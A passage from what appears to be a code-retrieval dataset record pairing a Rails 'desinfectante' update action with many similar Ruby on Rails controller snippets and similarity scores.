"def destroy\n @faixa_de_desconto = FaixaDeDesconto.find(params[:id])\n @faixa_de_desconto.destroy\n\n respond_to do |format|\n format.html { redirect_to(faixas_de_desconto_url) }\n format.xml { head :ok }\n end\n end",
"def destroy\n @interventoriasfecha = Interventoriasfecha.find(params[:id])\n @interventoriasfecha.destroy\n\n respond_to do |format|\n format.html { redirect_to(interventoriasfechas_url) }\n format.xml { head :ok }\n end\n end",
"def destroy\n @estado_despacho.destroy\n respond_to do |format|\n format.html { redirect_to estado_despachos_url }\n format.json { head :no_content }\n end\n end",
"def despesa_params\n params.require(:despesa).permit(:nome, :descricao, :valor)\n end",
"def destroy\n @devi.destroy\n respond_to do |format|\n format.html { redirect_to devis_url, notice: \"Le devis a été supprimé.\" }\n format.json { head :no_content }\n end\n end",
"def lista_desejo_params\n params.require(:lista_desejo).permit(:produto_id, :perfil_id)\n end",
"def destroy\n @diagnostiqueur.destroy\n respond_to do |format|\n format.html { redirect_to diagnostiqueurs_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @fertilizante.destroy\n respond_to do |format|\n format.html { redirect_to fertilizantes_url, notice: 'Fertilizante was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def create_declinaison\n\t\t@panier_autorise_model = PanierAutorise.find(params[:panier][:id])\n\t\t@declinaison_panier_autorise = DeclinaisonPanierAutorise.where('panier_autorise_id = ?', @panier_autorise_model.id)\n\t\t@declinaison_exist = false\n\t\t@declinaison_panier_autorise.each do |panier_|\n\t\t\tif panier_.nombre_personne.to_i == params[:declinaison_panier_autorise][:nombre_personne].to_i && panier_.duree.to_i == params[:declinaison_panier_autorise][:duree].to_i \n\t\t\t\t@declinaison_exist = true\n\t\t\tend\n\t\tend\n\t\t\n\t\t\n\t\tif @declinaison_exist == false\n\t\t\t@declinaison_panier_autorise = DeclinaisonPanierAutorise.new()\n\t\t\t@declinaison_panier_autorise.panier_autorise_id = @panier_autorise_model.id\n\t\t\t@declinaison_panier_autorise.prix_panier_ht = params[:declinaison_panier_autorise][:prix_panier_ht]\n\t\t\t@declinaison_panier_autorise.prix_panier_ttc = params[:declinaison_panier_autorise][:prix_panier_ttc]\n\t\t\t@declinaison_panier_autorise.nombre_personne = params[:declinaison_panier_autorise][:nombre_personne]\n\t\t\t@declinaison_panier_autorise.duree = params[:declinaison_panier_autorise][:duree]\n\t\t\tif @declinaison_panier_autorise.save\n\t\t\t\trespond_to do |format|\n\t\t\t \t\tformat.json { render :json => {\n\t\t\t\t \t\t:status => \"OK\",\n\t\t\t\t \t\t:error => 'Declinaison ajoute',\n\t\t\t\t \t\t:declinaison_panier_autorise => @declinaison_panier_autorise\n\t\t\t\t \t\t} \n\t\t\t\t \t}\n\t\t\t \t\tformat.html { \n\t\t\t \t\t\tflash[:notice] = 'La declinaison existe deja'\n\t\t\t \t\t\trender 'new' \n\t\t\t \t\t}\n\t\t\t \tend\n\t\t\t end\n\t\t\n\t\telse\n\t\t\trespond_to do |format|\n\t\t \t\tformat.json { render :json => {\n\t\t\t \t\t:status => \"error\",\n\t\t\t \t\t:error => 'La declinaison existe deja'\n\t\t\t \t\t} \n\t\t\t \t}\n\t\t \t\tformat.html { \n\t\t \t\t\tflash[:notice] = 'La declinaison existe deja'\n\t\t \t\t\trender 'new' \n\t\t \t\t}\n\t\t \tend\n\t\tend\t\n\tend",
"def create\n @faixa_de_desconto = FaixaDeDesconto.new(params[:faixa_de_desconto])\n\n respond_to do |format|\n if @faixa_de_desconto.save\n flash[:notice] = 'FaixaDeDesconto was successfully created.'\n format.html { redirect_to(@faixa_de_desconto) }\n format.xml { render :xml => @faixa_de_desconto, :status => :created, :location => @faixa_de_desconto }\n else\n format.html { render :action => \"new\" }\n format.xml { render :xml => @faixa_de_desconto.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def create\n @depoevento = Depoevento.new(params[:depoevento])\n\n respond_to do |format|\n if @depoevento.save\n format.html { redirect_to @depoevento, notice: 'Depoevento was successfully created.' }\n format.json { render json: @depoevento, status: :created, location: @depoevento }\n else\n format.html { render action: \"new\" }\n format.json { render json: @depoevento.errors, status: :unprocessable_entity }\n end\n end\n end",
"def detalle_params\n params.permit(:nofra, :codigoprd, :cantidad, :impuesto, :precio)\n end",
"def solicitar_lista_entregas_pdd pdd,kind,start_time,end_time\n require \"rubygems\"\n require 'json'\n require \"net/http\"\n require 'yaml'\n \n \n uri=URI( 'http://162.243.215.24/PDV/PDD_list_deliveries')\n \n resp = Net::HTTP.post_form(uri,'pddid'=>pdd,'kind'=>kind,'startime'=>start_time,'endtime'=>end_time,'token'=>\"mentira\")\n @record=JSON.parse(resp.body)\n @record\n #função ok\n \n end",
"def solicitudes_ingresadas\n\n if params[:desde] and params[:hasta]\n institucion_nombre = current_usuario.institucion.abreviatura\n\n d_desde = Date.new(params[:desde][2].to_i, params[:desde][1].to_i, params[:desde][0].to_i)\n d_hasta = Date.new(params[:hasta][2].to_i, params[:hasta][1].to_i, params[:hasta][0].to_i)\n\n @solicitudes = Solicitud.ingresadas(d_desde, d_hasta)\n end\n\n respond_to do |format|\n format.html { render :parametros_fecha }\n format.pdf do\n render :pdf => \"solicitudes_ingresadas_#{Time.now.to_i}\", \\\n :layout => \"print.html\", \\\n :page_size => \"Legal\", \\\n :orientation => \"Landscape\", \\\n :disposition=> 'attachment',\n :encoding => 'UTF-8'\n end\n end\n end",
"def destroy\n @solicitante.destroy\n respond_to do |format|\n format.html { redirect_to solicitantes_url, notice: 'Solicitante was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def create\n @deporte = Deporte.new(deporte_params)\n\n if @deporte.save\n render :show, status: :created, location: @deporte\n else\n render json: @deporte.errors, status: :unprocessable_entity\n end\n end",
"def destroy\n @detalle = Detalle.find(params[:id])\n @detalle.destroy\n\n respond_to do |format|\n format.html { redirect_to detalles_url }\n format.json { head :no_content }\n end\n end",
"def listado_params\n params.require(:listado).permit(:asignatura_id, :estudiantes)\n end",
"def create\n @lista_desejo = ListaDesejo.new(lista_desejo_params)\n\n respond_to do |format|\n if @lista_desejo.save\n format.html { redirect_to back_uri, warning: 'Adicionado a lista de desejos.' }\n format.json { render :show, status: :created, location: @lista_desejo }\n else\n format.html { render :new }\n format.json { render json: @lista_desejo.errors, status: :unprocessable_entity }\n end\n end\n end",
"def destroy\n @datos_estudiante.destroy\n respond_to do |format|\n format.html { redirect_to datos_estudiantes_url, notice: 'Datos estudiante was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @detalhe.destroy\n respond_to do |format|\n format.html { redirect_to detalhes_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @it_inscripcion_registro.destroy\n respond_to do |format|\n format.html { redirect_to it_inscripcion_registros_url, notice: 'El registro de inscripción se eliminó correctamente.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @informacao.destroy\n respond_to do |format|\n format.html { redirect_to informacoes_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @descuento_adicional.destroy\n respond_to do |format|\n format.html { redirect_to descuento_adicionals_url, notice: 'Descuento adicional was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def create\n @descuento = Descuento.new(descuento_params)\n\n respond_to do |format|\n if @descuento.save\n format.html { redirect_to @descuento, notice: 'Descuento fue creado exitosamente.' }\n format.json { render :show, status: :created, location: @descuento }\n else\n format.html { render :new }\n format.json { render json: @descuento.errors, status: :unprocessable_entity }\n end\n end\n end",
"def destroy\n @adicional_desconto = AdicionalDesconto.find(params[:id])\n @adicional_desconto.destroy\n\n respond_to do |format|\n flash[:notice] = 'Adicional / Desconto excluído com sucesso.'\n #format.html { redirect_to(adicional_descontos_url) }\n format.html { redirect_to(adicional_descontos_path) }\n format.xml { head :ok }\n end\n end",
"def destroy\n @serie_detalle.destroy\n respond_to do |format|\n format.html { redirect_to serie_detalles_url, notice: 'Serie detalle was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def detalle_params\n params.require(:detalle).permit(:jobName, :buildNumber, :output, :ejecutor, :fecha, :tiendas, :status, :pos)\n end",
"def destroy\n @solicitud.destroy\n respond_to do |format|\n format.html { redirect_to solicitudes_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @detpedido.destroy\n respond_to do |format|\n format.html { redirect_to detpedidos_url, notice: 'Detpedido was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def dece_params\n params.require(:dece).permit(:date_dc, :local, :nom, :prenom, :date_nai, :lieu_nai, :sexe, :situ_mat, :profession, :domicil, :nom_prenom_pere, :nom_prenom_mere, :nom_prenom_declare, :domicil_declare, :profession_declare, :date_declare_dece, :nom_prenom_officie, :qualite_officie, :date_officie, :n_volet)\n end",
"def create\n @adicional_desconto = AdicionalDesconto.new(params[:adicional_desconto])\n\n respond_to do |format|\n if @adicional_desconto.save\n flash[:notice] = 'Adicional / Desconto cadastrado com sucesso.'\n #format.html { redirect_to(@adicional_desconto) }\n format.html { redirect_to(adicional_descontos_path) }\n format.xml { render :xml => @adicional_desconto, :status => :created, :location => @adicional_desconto }\n else\n format.html { render :action => \"new\" }\n format.xml { render :xml => @adicional_desconto.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def new\n @deuda = Deuda.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @deuda }\n end\n end",
"def destroy\n @descuento = Descuento.find(params[:id])\n @descuento.destroy\n\n respond_to do |format|\n format.html { redirect_to descuentos_url }\n format.json { head :no_content }\n end\n end",
"def create_ofertas\n\n\n\n arr_ofertas = []\n params.select { |par, val| par.starts_with?('oferta') && val.present? }.each do |puja|\n mid = puja.first.delete('oferta_')\n eliminar = params[\"delflag#{mid}\"] == '1'\n oferta = Oferta.new :mercado_id => mid, :seleccion_id => current_user.current_seleccion(session).id, :valor => puja.last.to_f, :estado => Oferta::PENDIENTE\n oferta.estado = Oferta::CANCELADA if eliminar\n\n oferta = oferta.save_if_valid\n arr_ofertas << I18n.t('mercado.oferta.oferta_creada', {:jugador => oferta.mercado.jugador.nombre, :valor => oferta.valor})\n end\n\n flash.now[:notice] = arr_ofertas.join '<br/>'\n\n # actualizamos los datos\n datos_ofertas\n\n respond_to do |format|\n format.js\n end\n\n end",
"def new\n @detalle = Detalle.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @detalle }\n end\n end",
"def destroy\n @estado_notificacion.destroy\n respond_to do |format|\n format.html { redirect_to estado_notificacions_url }\n format.json { head :no_content }\n end\n end",
"def create\n @detalle_factura = DetalleFactura.new(detalle_factura_params)\n\n respond_to do |format|\n if @detalle_factura.save\n format.html { redirect_to @detalle_factura, notice: 'Detalle factura was successfully created.' }\n format.json { render :show, status: :created, location: @detalle_factura }\n else\n format.html { render :new }\n format.json { render json: @detalle_factura.errors, status: :unprocessable_entity }\n end\n end\n end",
"def new\n @adicional_desconto = AdicionalDesconto.new\n @adicional_desconto_tipos = AdicionalDescontoTipo.find(:all)\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @adicional_desconto }\n end\n end",
"def new\n @descuento = Descuento.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @descuento }\n end\n end",
"def despacho_params\n params.require(:despacho).permit(:cliente_id, :nombre, :lugar_de_entrega, :telefono, :celular, :correo)\n end",
"def destroy\n @dfactura.destroy\n respond_to do |format|\n format.html { redirect_to dfacturas_url, notice: 'Detalle de factura eliminado con éxito.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @deuda = Deuda.find(params[:id])\n @deuda.destroy\n\n respond_to do |format|\n format.html { redirect_to deudas_url }\n format.json { head :no_content }\n end\n end",
"def create\n @descuento = Descuento.new(params[:descuento])\n\n respond_to do |format|\n if @descuento.save\n format.html { redirect_to @descuento, notice: 'Descuento was successfully created.' }\n format.json { render json: @descuento, status: :created, location: @descuento }\n else\n format.html { render action: \"new\" }\n format.json { render json: @descuento.errors, status: :unprocessable_entity }\n end\n end\n end",
"def destroy\n @tecnica_de_impresion.destroy\n respond_to do |format|\n format.html { redirect_to tecnicas_de_impresion_url, notice: 'Tecnica de impresion was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @desire.destroy\n\n respond_to do |format|\n format.html { redirect_to desires_url }\n format.json { head :ok }\n end\n end",
"def destroy\n @ordenes_consumos_detalle.destroy\n respond_to do |format|\n format.html { redirect_to ordenes_consumos_detalles_url, notice: 'Ordenes consumos detalle was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @interessado.destroy\n respond_to do |format|\n format.html { redirect_to interessados_url }\n format.json { head :no_content }\n end\n end",
"def new\n @deporte_usuario = DeporteUsuario.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @deporte_usuario }\n end\n end",
"def destroy\n set_redireccion\n @objeto.destroy\n respond_to do |format|\n format.html { redirect_to @redireccion, notice: 'Detalle pedido was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def create\n params[:futbolada][:usuario_id] = current_usuario.id\n @futbolada = Futbolada.new(params[:futbolada])\n\n respond_to do |format|\n if @futbolada.save\n @futbolada.numero = \"#{Time.zone.now.strftime('%Y%m%d%H%M%S')}-#{@futbolada.id}F\"\n @futbolada.save\n StatusServicioSolicitado.servicio_email(current_usuario,@futbolada).deliver\n session[:exito] = \"si\"\n session[:modulo] = \"futbolada\"\n format.html { redirect_to index_url }\n format.json { render json: @futbolada, status: :created, location: @futbolada }\n else\n format.html { render action: \"new\" }\n format.json { render json: @futbolada.errors, status: :unprocessable_entity }\n end\n end\n end",
"def destroy\n @estado_remate.destroy\n respond_to do |format|\n format.html { redirect_to estado_remates_url }\n format.json { head :no_content }\n end\n end",
"def create\n @enfermedade = Enfermedade.new(enfermedade_params)\n\n respond_to do |format|\n if @enfermedade.save\n format.html { redirect_to new_padecimiento_path, notice: 'Ahora, por favor dinos a qué eres alérgico' }\n\n else\n format.html { render action: 'new' }\n format.json { render json: @enfermedade.errors, status: :unprocessable_entity }\n end\n end\n end",
"def detalle_params \n params.permit(:nofra, :codigoprd, :cantidad, :impuesto, :precio)\n end",
"def devolucao_params\n params.require(:devolucao).permit(:data, :nivel_combustivel, :quilometragem, \n :entregou_notas, :veiculo_id, :usuario_id, :status, :reserva_id)\n end",
"def destroy\n @solicitudinforme.destroy\n respond_to do |format|\n format.html { redirect_to solicitudinformes_url, notice: 'Solicitudinforme was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @datos_insumos_reactivo.destroy\n respond_to do |format|\n format.html { redirect_to datos_insumos_reactivos_url }\n format.json { head :no_content }\n end\n end",
"def create\n \n @endereco = Endereco.new(params[:endereco])\n\t@endereco.cliente_id=session[:usuario_id]\n\t\n respond_to do |format|\n if @endereco.save\n format.html { redirect_to \"/dados\", notice: 'O endereço foi cadastrado com sucesso!' }\n format.json { render json: @endereco, status: :created, location: @endereco }\n else\n format.html { render action: \"new\" }\n format.json { render json: @endereco.errors, status: :unprocessable_entity }\n end\n end\n end",
"def destroy\n @inscripcion.destroy\n respond_to do |format|\n format.html { redirect_to inscripcions_url, notice: 'Inscripcion was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def update\n respond_to do |format|\n if @desinfectante.update(desinfectante_params)\n format.html { redirect_to @desinfectante, notice: 'Desinfectante was successfully updated.' }\n format.json { render :show, status: :ok, location: @desinfectante }\n else\n format.html { render :edit }\n format.json { render json: @desinfectante.errors, status: :unprocessable_entity }\n end\n end\n end",
"def destroy\n @fornecedor_endereco.destroy\n respond_to do |format|\n format.html { redirect_to fornecedor_enderecos_url, notice: 'Fornecedor endereco was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def devolucion_params\n params.require(:devolucion).permit(:id_devolucion, :fecha_devolucion)\n end",
"def tecnicos_postulados\n coleccion = []\n self.request.each do |request|\n info = {}\n info[:id] = request.id\n info[:article] = request.article\n info[:servicio] = request.service.description\n info[:tecnicos] = request.proposal\n coleccion.append(info)\n end\n coleccion\n end",
"def destroy\n @donante.destroy\n respond_to do |format|\n format.html { redirect_to donantes_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @faltante.destroy\n respond_to do |format|\n format.html { redirect_to faltantes_url, notice: 'Faltante was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @depoevento = Depoevento.find(params[:id])\n @depoevento.destroy\n\n respond_to do |format|\n format.html { redirect_to depoeventos_url }\n format.json { head :ok }\n end\n end",
"def create\n @organisme = Organisme.new(organisme_params)\n params[:departements] ||= []\n @organisme.departements.delete_all\n @dep_table = params[:departements]\n logger.debug \"Departements table sent : #@dep_table\"\n @dep_table.each do |depid|\n @organisme.departements << Departement.find(depid)\n end\n respond_to do |format|\n if @organisme.save\n format.html { redirect_to action: \"index\", notice: 'Organisme was successfully created.' }\n format.json { render :index, status: :created, location: @organisme }\n else\n format.html { render :new }\n format.json { render json: @organisme.errors, status: :unprocessable_entity }\n end\n end\n end",
"def destroy\n @solicitacao_tipo.destroy\n respond_to do |format|\n format.html { redirect_to solicitacao_tipos_url }\n format.json { head :no_content }\n end\n end",
"def new\n @expediente = Expediente.new\n @municipios = Municipio.all\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @expediente }\n end\n end",
"def create\n @descuento_adicional = DescuentoAdicional.new(descuento_adicional_params)\n\n respond_to do |format|\n if @descuento_adicional.save\n format.html { redirect_to @descuento_adicional, notice: 'Descuento adicional fue creado exitosamente.' }\n format.json { render :show, status: :created, location: @descuento_adicional }\n else\n format.html { render :new }\n format.json { render json: @descuento_adicional.errors, status: :unprocessable_entity }\n end\n end\n end",
"def destroy\n @datosgenerale.destroy\n respond_to do |format|\n format.html { redirect_to datosgenerales_url }\n format.json { head :no_content }\n end\n end",
"def create\n @estado_despacho = EstadoDespacho.new(estado_despacho_params)\n\n respond_to do |format|\n if @estado_despacho.save\n format.html { redirect_to @estado_despacho, notice: 'Estado despacho was successfully created.' }\n format.json { render :show, status: :created, location: @estado_despacho }\n else\n format.html { render :new }\n format.json { render json: @estado_despacho.errors, status: :unprocessable_entity }\n end\n end\n end"
] |
[
"0.6715804",
"0.64218324",
"0.62631243",
"0.6013901",
"0.58974636",
"0.58731997",
"0.5789425",
"0.577496",
"0.5768931",
"0.57493615",
"0.57434523",
"0.5661222",
"0.5650956",
"0.56354165",
"0.56324345",
"0.5581517",
"0.5562345",
"0.5549814",
"0.5548201",
"0.55382335",
"0.5538218",
"0.55352926",
"0.5525808",
"0.55210894",
"0.5518888",
"0.55088043",
"0.55072886",
"0.54986495",
"0.5476496",
"0.546379",
"0.54594713",
"0.5458466",
"0.5452543",
"0.5448581",
"0.54449636",
"0.54431003",
"0.54367006",
"0.5430103",
"0.5427039",
"0.5417988",
"0.5410215",
"0.54057276",
"0.5404495",
"0.5403637",
"0.53757733",
"0.53697246",
"0.5362125",
"0.53596604",
"0.5357548",
"0.53565437",
"0.5354525",
"0.53542125",
"0.53521574",
"0.53448206",
"0.5344592",
"0.5343678",
"0.5339021",
"0.5336358",
"0.5335423",
"0.5334873",
"0.53320765",
"0.53275543",
"0.5323121",
"0.5321969",
"0.53207433",
"0.53171015",
"0.5313298",
"0.5310646",
"0.5308801",
"0.5304889",
"0.5302873",
"0.53011763",
"0.5295491",
"0.5295377",
"0.52953064",
"0.529405",
"0.5293441",
"0.5291239",
"0.5289629",
"0.5289595",
"0.528723",
"0.528676",
"0.52855235",
"0.52811676",
"0.52791685",
"0.5277106",
"0.52684367",
"0.52669674",
"0.52640635",
"0.52598536",
"0.5259335",
"0.5255984",
"0.52473485",
"0.52457327",
"0.524465",
"0.52428",
"0.5242118",
"0.52393293",
"0.52328926",
"0.5229083"
] |
0.66236925
|
1
|
PATCH/PUT /desinfectantes/1 PATCH/PUT /desinfectantes/1.json
|
def update
respond_to do |format|
if @desinfectante.update(desinfectante_params)
format.html { redirect_to @desinfectante, notice: 'Desinfectante was successfully updated.' }
format.json { render :show, status: :ok, location: @desinfectante }
else
format.html { render :edit }
format.json { render json: @desinfectante.errors, status: :unprocessable_entity }
end
end
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def update\n @servicio = Servicio.find(params[:id])\n\n respond_to do |format|\n if @servicio.update_attributes(params[:servicio])\n format.html { redirect_to @servicio, :notice => 'Servicio was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render :action => \"edit\" }\n format.json { render :json => @servicio.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def update\n @detalle = Detalle.find(params[:id])\n\n respond_to do |format|\n if @detalle.update_attributes(params[:detalle])\n format.html { redirect_to @detalle, notice: 'Detalle was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @detalle.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @objeto.update(detalle_pedido_params)\n set_redireccion\n format.html { redirect_to @redireccion, notice: 'Detalle pedido was successfully updated.' }\n format.json { render :show, status: :ok, location: @objeto }\n else\n format.html { render :edit }\n format.json { render json: @objeto.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n obtener_datos()\n @status = params[:statusproyect]\n @cliente = params[:cliente] + \" \" +params[:cliente_apellido]\n respond_to do |format|\n if @ventum.update(cliente: @cliente, clave:@clave, fecha:@fecha, iva:@iva,subtotal:@preciofinal ,total:@totalcosto, descuentogeneral: @descglobal , distribuidor: @distribuidor, status: @status)\n @detail.each do |x|\n x.destroy\n end\n salvar()\n format.html { redirect_to @ventum, notice: 'Venta actualizada correctamente.' }\n format.json { render :show, status: :ok, location: @ventum }\n else\n format.html { render :edit }\n format.json { render json: @ventum.errors, status: :unprocessable_entity }\n end\n end\n end",
"def actualizacion \n fiesta.update (params[:id]) \n render json: fiesta\n end",
"def update\n @oferta = Oferta.find(params[:id])\n\n respond_to do |format|\n if @oferta.update_attributes(params[:oferta])\n format.html { redirect_to [:admin, @oferta], :notice => 'Exemplo was successfully updated.' }\n format.json { head :ok }\n else\n format.html { render :action => \"edit\" }\n format.json { render :json => @oferta.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @sivic_discipulo.update(sivic_discipulo_params_netested)\n format.html { redirect_to @sivic_discipulo, notice: 'Registro alterado com sucesso.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @sivic_discipulo.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @servico_pacote.update(servico_pacote_params)\n format.html { redirect_to @servico_pacote, notice: 'Pacote was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @servico_pacote.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @detalle.update(detalle_params)\n format.html { redirect_to @detalle, notice: 'Detalle was successfully updated.' }\n format.json { render :show, status: :ok, location: @detalle }\n else\n format.html { render :edit }\n format.json { render json: @detalle.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @telefon = Telefon.find(params[:id])\n @telefon.update_attributes(params[:telefon])\n respond_with(@telefon)\n end",
"def update\n respond_to do |format|\n if @tipo_de_servicio.update(tipo_de_servicio_params)\n format.html { redirect_to @tipo_de_servicio, notice: 'Tipo de servicio was successfully updated.' }\n format.json { render :show, status: :ok, location: @tipo_de_servicio }\n else\n format.html { render :edit }\n format.json { render json: @tipo_de_servicio.errors, status: :unprocessable_entity }\n end\n end\n end",
"def patch\n headers = {\"If-Match\" => @version}\n response = @context.request :patch, \"#{@path}/#{@id}\", @data.to_json, headers\n @version += 1\n response\n # 'X-HTTP-Method-Override' => 'PATCH'\n end",
"def patch!\n request! :patch\n end",
"def update\n @solicitud_servicio = SolicitudServicio.find(params[:id])\n\n respond_to do |format|\n if @solicitud_servicio.update_attributes(params[:solicitud_servicio])\n format.html { redirect_to @solicitud_servicio, notice: 'Solicitud servicio was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @solicitud_servicio.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @cliente.update(cliente_params)\n #--ADICIONADO\n \t @cliente.perfilclientes.destroy_all()\n if params[:cliente][:perfil_ids]\n \t\tparams[:cliente][:perfil_ids].each do |ss|\n \t\t\t@cliente.perfilclientes.create(:cliente_id => @cliente.id, :perfil_id => ss)\n \t\tend\n end\n #--ADICIONADO\n format.html { redirect_to clientes_url, notice: 'Cliente actualizado com sucesso.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @cliente.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @respuesta = Respuesta.find(params[:id])\n\n respond_to do |format|\n if @respuesta.update_attributes(params[:respuesta])\n format.html { redirect_to @respuesta, notice: 'Respuesta was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @respuesta.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @veiculo = Veiculo.find(params[:id])\n\n respond_to do |format|\n if @veiculo.update_attributes(params[:veiculo])\n format.html { redirect_to @veiculo, :notice => 'Veiculo was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render :action => \"edit\" }\n format.json { render :json => @veiculo.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def update\n @fulcliente = Fulcliente.find(params[:id])\n\n respond_to do |format|\n if @fulcliente.update_attributes(params[:fulcliente])\n format.html { redirect_to @fulcliente, notice: 'Fulcliente was successfully updated.' }\n format.json { head :ok }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @fulcliente.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @detalhe.update(detalhe_params)\n format.html { redirect_to @detalhe, notice: 'Detalhe was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @detalhe.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @safra_verdoso = SafraVerdoso.find(params[:id])\n\n respond_to do |format|\n if @safra_verdoso.update_attributes(params[:safra_verdoso])\n format.html { redirect_to \"/safra_produtos/#{@safra_verdoso.safra_produto_id}/descontos\"}\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @safra_verdoso.errors, status: :unprocessable_entity }\n end\n end\n end",
"def activo_update\n respond_to do |format|\n activo = params[:laboratorio][:activo]\n id = params[:id]\n Laboratorio.where(id: id).update_all(activo: activo )\n msg = { :status => \"ok\", :message => \"Actualizado!\" }\n format.json { render :json => msg }\n end\n end",
"def update\n @respuesta = Respuesta.find(params[:id])\n\n if @respuesta.update(params[:respuesta])\n head :no_content\n else\n render json: @respuesta.errors, status: :unprocessable_entity\n end\n end",
"def update\n @deuda = Deuda.find(params[:id])\n\n# XXX: http://stackoverflow.com/questions/5629402/how-to-test-if-parameters-exist-in-rails\n if(params[:deuda].has_key?(:deuda_original_id))\n logger.debug(\"Se slecciono deuda original\")\n if(@deuda.credito.present?)\n logger.debug(\"Estaba asociado con un credito\")\n# XXX: http://stackoverflow.com/questions/12023854/rails-remove-child-association-from-parent\n @deuda.credito.deudas.delete(@deuda)\n end\n @deuda.credito_id=nil\n end\n\n respond_to do |format|\n if @deuda.update_attributes(params[:deuda])\n format.html { redirect_to @deuda, notice: 'Deuda was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @deuda.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @calificacion_servicio = CalificacionServicio.find(params[:id])\n\n respond_to do |format|\n if @calificacion_servicio.update_attributes(params[:calificacion_servicio])\n format.html { redirect_to @calificacion_servicio, notice: 'Calificacion servicio was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @calificacion_servicio.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @compra_detalle = CompraDetalle.find(params[:id])\n\n respond_to do |format|\n if @compra_detalle.update_attributes(params[:compra_detalle])\n format.html { redirect_to @compra_detalle, notice: 'Compra detalle was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @compra_detalle.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @servico.update(servico_params)\n format.html { redirect_to servicos_url, notice: 'Serviço atualizado com sucesso.' }\n format.json { render :show, status: :ok, location: @servico }\n else\n format.html { render :edit }\n format.json { render json: @servico.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @serv_adicionale = ServAdicionale.find(params[:id])\n\n respond_to do |format|\n if @serv_adicionale.update_attributes(params[:serv_adicionale])\n format.html { redirect_to @serv_adicionale, notice: 'Serv adicionale was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @serv_adicionale.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @objeto.update(etiqueta_params)\n format.html { redirect_to @objeto, notice: 'Etiqueta was successfully updated.' }\n format.json { render :show, status: :ok, location: @objeto }\n else\n format.html { render :edit }\n format.json { render json: @objeto.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @dependencia = Dependencia.find(params[:id])\n\n respond_to do |format|\n if @dependencia.update_attributes(dependencia_params)\n format.html { redirect_to @dependencia, notice: 'Dependencia se actualizo correctamente.' }\n format.json { head :no_content }\n format.js{}\n else\n format.html { render action: \"edit\" }\n format.json { render json: @dependencia.errors, status: :unprocessable_entity }\n format.js{}\n end\n end\n end",
